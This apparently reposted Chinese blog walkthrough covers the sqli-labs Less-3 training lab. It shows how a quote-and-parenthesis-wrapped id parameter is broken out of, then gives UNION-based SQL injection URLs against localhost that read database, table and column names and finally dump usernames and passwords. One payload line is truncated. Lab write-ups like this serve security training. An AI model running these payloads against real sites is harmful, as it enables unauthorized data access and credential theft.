标签:Less union labs Sqli 报错 sql id select
1.找注入点
这一关的名字叫做 quotes with twist ,扭曲的引号,为什么这么说呢,
我们先来看看测试报错,后面加上双引号,可以看到没报错
后面加上' 报错,这里不注意看这个报错信息的话,找到注入点直接上payload会发现还是报错
这里就出现所谓的扭曲了,注意看报错返回的),括号,在sql语法中加入了(),对传入参数$id的引用
来看看源码,果然是有括号的
2.构造payload
接下来就可以根据这点来构造payload了,之前我们已经知道他查询是3个字段了,就不在从头开始探查了
http://127.0.0.1/sql/Less-3/?id=-2') union select 1,2,3 --+
爆数据库名
http://127.0.0.1/sql/Less-3/?id=-2') union select 1,database(),(select group_concat(schema_name) from
爆表名
http://127.0.0.1/sql/Less-3/?id=-2') union select 1,NULL,(select group_concat(table_name) from information_schema.tables where table_schema = "security") --+
爆字段
http://127.0.0.1/sql/Less-3/?id=-2') union select 1,NULL,(select group_concat(column_name) from information_schema.columns where table_name = "users") --+
爆数据
http://127.0.0.1/sql/Less-3/?id=-2') union select 1,NULL,(select group_concat(username,0x3a,password) from users ) --+
最关键的还是要找到注入点和绕过方式~~
标签:Less,union,labs,Sqli,报错,sql,id,select 来源: https://www.cnblogs.com/byErichas/p/15174641.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。